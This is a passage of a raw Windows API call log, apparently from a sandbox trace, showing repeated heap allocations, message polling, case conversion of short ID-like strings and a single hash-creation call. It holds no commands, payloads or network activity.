hHeap=0x25c0000) returned 1 [0200.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.349] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0200.349] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.350] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0200.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.350] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.350] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.351] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.351] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0200.351] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.351] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.351] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.352] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0200.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.352] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0200.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.352] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.353] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.353] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.353] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.353] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.354] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.354] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.354] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.354] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.354] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.355] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.355] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.355] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.355] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.356] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.356] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.356] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.356] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.357] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0200.357] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.357] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.357] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.357] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.357] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.358] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0200.358] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.358] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.358] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.358] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.358] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0200.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.359] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.359] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.360] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.360] RtlAllocateHeap 